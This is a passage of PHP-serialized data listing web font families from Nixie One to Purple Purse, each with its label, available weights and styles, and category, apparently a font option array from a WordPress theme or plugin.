rif\";}s:9:\"Nixie One\";a:3:{s:5:\"label\";s:9:\"Nixie One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Nobile\";a:3:{s:5:\"label\";s:6:\"Nobile\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Nokora\";a:3:{s:5:\"label\";s:6:\"Nokora\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Norican\";a:3:{s:5:\"label\";s:7:\"Norican\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Nosifer\";a:3:{s:5:\"label\";s:7:\"Nosifer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Notable\";a:3:{s:5:\"label\";s:7:\"Notable\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Nothing You Could Do\";a:3:{s:5:\"label\";s:20:\"Nothing You Could Do\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Noticia Text\";a:3:{s:5:\"label\";s:12:\"Noticia Text\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Noto Sans\";a:3:{s:5:\"label\";s:9:\"Noto Sans\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans HK\";a:3:{s:5:\"label\";s:12:\"Noto Sans HK\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans JP\";a:3:{s:5:\"label\";s:12:\"Noto Sans JP\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans KR\";a:3:{s:5:\"label\";s:12:\"Noto Sans KR\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans SC\";a:3:{s:5:\"label\";s:12:\"Noto Sans SC\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans TC\";a:3:{s:5:\"label\";s:12:\"Noto Sans TC\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Noto Serif\";a:3:{s:5:\"label\";s:10:\"Noto Serif\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Noto Serif JP\";a:3:{s:5:\"label\";s:13:\"Noto Serif JP\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Noto Serif KR\";a:3:{s:5:\"label\";s:13:\"Noto Serif KR\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Noto Serif SC\";a:3:{s:5:\"label\";s:13:\"Noto Serif SC\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Noto Serif TC\";a:3:{s:5:\"label\";s:13:\"Noto Serif TC\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Nova Cut\";a:3:{s:5:\"label\";s:8:\"Nova Cut\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Nova Flat\";a:3:{s:5:\"label\";s:9:\"Nova Flat\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Nova Mono\";a:3:{s:5:\"label\";s:9:\"Nova Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:9:\"Nova Oval\";a:3:{s:5:\"label\";s:9:\"Nova Oval\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Nova Round\";a:3:{s:5:\"label\";s:10:\"Nova Round\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Nova Script\";a:3:{s:5:\"label\";s:11:\"Nova Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Nova Slim\";a:3:{s:5:\"label\";s:9:\"Nova Slim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Nova Square\";a:3:{s:5:\"label\";s:11:\"Nova Square\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Numans\";a:3:{s:5:\"label\";s:6:\"Numans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Nunito\";a:3:{s:5:\"label\";s:6:\"Nunito\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Nunito Sans\";a:3:{s:5:\"label\";s:11:\"Nunito Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Odibee Sans\";a:3:{s:5:\"label\";s:11:\"Odibee Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Odor Mean Chey\";a:3:{s:5:\"label\";s:14:\"Odor Mean Chey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Offside\";a:3:{s:5:\"label\";s:7:\"Offside\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:2:\"Oi\";a:3:{s:5:\"label\";s:2:\"Oi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Old Standard TT\";a:3:{s:5:\"label\";s:15:\"Old Standard TT\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Oldenburg\";a:3:{s:5:\"label\";s:9:\"Oldenburg\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Oleo Script\";a:3:{s:5:\"label\";s:11:\"Oleo Script\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:22:\"Oleo Script Swash Caps\";a:3:{s:5:\"label\";s:22:\"Oleo Script Swash Caps\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Open Sans\";a:3:{s:5:\"label\";s:9:\"Open Sans\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Open Sans Condensed\";a:3:{s:5:\"label\";s:19:\"Open Sans Condensed\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Oranienbaum\";a:3:{s:5:\"label\";s:11:\"Oranienbaum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Orbitron\";a:3:{s:5:\"label\";s:8:\"Orbitron\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Oregano\";a:3:{s:5:\"label\";s:7:\"Oregano\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Orelega One\";a:3:{s:5:\"label\";s:11:\"Orelega One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Orienta\";a:3:{s:5:\"label\";s:7:\"Orienta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Original Surfer\";a:3:{s:5:\"label\";s:15:\"Original Surfer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Oswald\";a:3:{s:5:\"label\";s:6:\"Oswald\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Otomanopee One\";a:3:{s:5:\"label\";s:14:\"Otomanopee One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Over the Rainbow\";a:3:{s:5:\"label\";s:16:\"Over the Rainbow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Overlock\";a:3:{s:5:\"label\";s:8:\"Overlock\";s:8:\"variants\";a:6:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:3:\"900\";i:3;s:9:\"900italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Overlock SC\";a:3:{s:5:\"label\";s:11:\"Overlock SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Overpass\";a:3:{s:5:\"label\";s:8:\"Overpass\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Overpass Mono\";a:3:{s:5:\"label\";s:13:\"Overpass Mono\";s:8:\"variants\";a:4:{i:0;s:3:\"300\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:3:\"Ovo\";a:3:{s:5:\"label\";s:3:\"Ovo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Oxanium\";a:3:{s:5:\"label\";s:7:\"Oxanium\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Oxygen\";a:3:{s:5:\"label\";s:6:\"Oxygen\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Oxygen Mono\";a:3:{s:5:\"label\";s:11:\"Oxygen Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"PT Mono\";a:3:{s:5:\"label\";s:7:\"PT Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"PT Sans\";a:3:{s:5:\"label\";s:7:\"PT Sans\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"PT Sans Caption\";a:3:{s:5:\"label\";s:15:\"PT Sans Caption\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"PT Sans Narrow\";a:3:{s:5:\"label\";s:14:\"PT Sans Narrow\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"PT Serif\";a:3:{s:5:\"label\";s:8:\"PT Serif\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"PT Serif Caption\";a:3:{s:5:\"label\";s:16:\"PT Serif Caption\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Pacifico\";a:3:{s:5:\"label\";s:8:\"Pacifico\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Padauk\";a:3:{s:5:\"label\";s:6:\"Padauk\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Palanquin\";a:3:{s:5:\"label\";s:9:\"Palanquin\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Palanquin Dark\";a:3:{s:5:\"label\";s:14:\"Palanquin Dark\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Pangolin\";a:3:{s:5:\"label\";s:8:\"Pangolin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Paprika\";a:3:{s:5:\"label\";s:7:\"Paprika\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Parisienne\";a:3:{s:5:\"label\";s:10:\"Parisienne\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Passero One\";a:3:{s:5:\"label\";s:11:\"Passero One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Passion One\";a:3:{s:5:\"label\";s:11:\"Passion One\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"900\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:18:\"Pathway Gothic One\";a:3:{s:5:\"label\";s:18:\"Pathway Gothic One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Patrick Hand\";a:3:{s:5:\"label\";s:12:\"Patrick Hand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Patrick Hand SC\";a:3:{s:5:\"label\";s:15:\"Patrick Hand SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Pattaya\";a:3:{s:5:\"label\";s:7:\"Pattaya\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Patua One\";a:3:{s:5:\"label\";s:9:\"Patua One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Pavanam\";a:3:{s:5:\"label\";s:7:\"Pavanam\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Paytone One\";a:3:{s:5:\"label\";s:11:\"Paytone One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Peddana\";a:3:{s:5:\"label\";s:7:\"Peddana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Peralta\";a:3:{s:5:\"label\";s:7:\"Peralta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Permanent Marker\";a:3:{s:5:\"label\";s:16:\"Permanent Marker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:19:\"Petit Formal Script\";a:3:{s:5:\"label\";s:19:\"Petit Formal Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Petrona\";a:3:{s:5:\"label\";s:7:\"Petrona\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Philosopher\";a:3:{s:5:\"label\";s:11:\"Philosopher\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Piazzolla\";a:3:{s:5:\"label\";s:9:\"Piazzolla\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Piedra\";a:3:{s:5:\"label\";s:6:\"Piedra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Pinyon Script\";a:3:{s:5:\"label\";s:13:\"Pinyon Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Pirata One\";a:3:{s:5:\"label\";s:10:\"Pirata One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Plaster\";a:3:{s:5:\"label\";s:7:\"Plaster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Play\";a:3:{s:5:\"label\";s:4:\"Play\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Playball\";a:3:{s:5:\"label\";s:8:\"Playball\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Playfair Display\";a:3:{s:5:\"label\";s:16:\"Playfair Display\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Playfair Display SC\";a:3:{s:5:\"label\";s:19:\"Playfair Display SC\";s:8:\"variants\";a:6:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:3:\"900\";i:3;s:9:\"900italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Podkova\";a:3:{s:5:\"label\";s:7:\"Podkova\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Poiret One\";a:3:{s:5:\"label\";s:10:\"Poiret One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Poller One\";a:3:{s:5:\"label\";s:10:\"Poller One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Poly\";a:3:{s:5:\"label\";s:4:\"Poly\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Pompiere\";a:3:{s:5:\"label\";s:8:\"Pompiere\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Pontano Sans\";a:3:{s:5:\"label\";s:12:\"Pontano Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Poor Story\";a:3:{s:5:\"label\";s:10:\"Poor Story\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Poppins\";a:3:{s:5:\"label\";s:7:\"Poppins\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Port Lligat Sans\";a:3:{s:5:\"label\";s:16:\"Port Lligat Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Port Lligat Slab\";a:3:{s:5:\"label\";s:16:\"Port Lligat Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Potta One\";a:3:{s:5:\"label\";s:9:\"Potta One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Pragati Narrow\";a:3:{s:5:\"label\";s:14:\"Pragati Narrow\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Prata\";a:3:{s:5:\"label\";s:5:\"Prata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Preahvihear\";a:3:{s:5:\"label\";s:11:\"Preahvihear\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Press Start 2P\";a:3:{s:5:\"label\";s:14:\"Press Start 2P\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Pridi\";a:3:{s:5:\"label\";s:5:\"Pridi\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Princess Sofia\";a:3:{s:5:\"label\";s:14:\"Princess Sofia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Prociono\";a:3:{s:5:\"label\";s:8:\"Prociono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Prompt\";a:3:{s:5:\"label\";s:6:\"Prompt\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Prosto One\";a:3:{s:5:\"label\";s:10:\"Prosto One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Proza Libre\";a:3:{s:5:\"label\";s:11:\"Proza Libre\";s:8:\"variants\";a:10:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Public Sans\";a:3:{s:5:\"label\";s:11:\"Public Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Puritan\";a:3:{s:5:\"label\";s:7:\"Puritan\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Purple Purse\";a:3:{s:5:\"label\";s:12:\"Purple 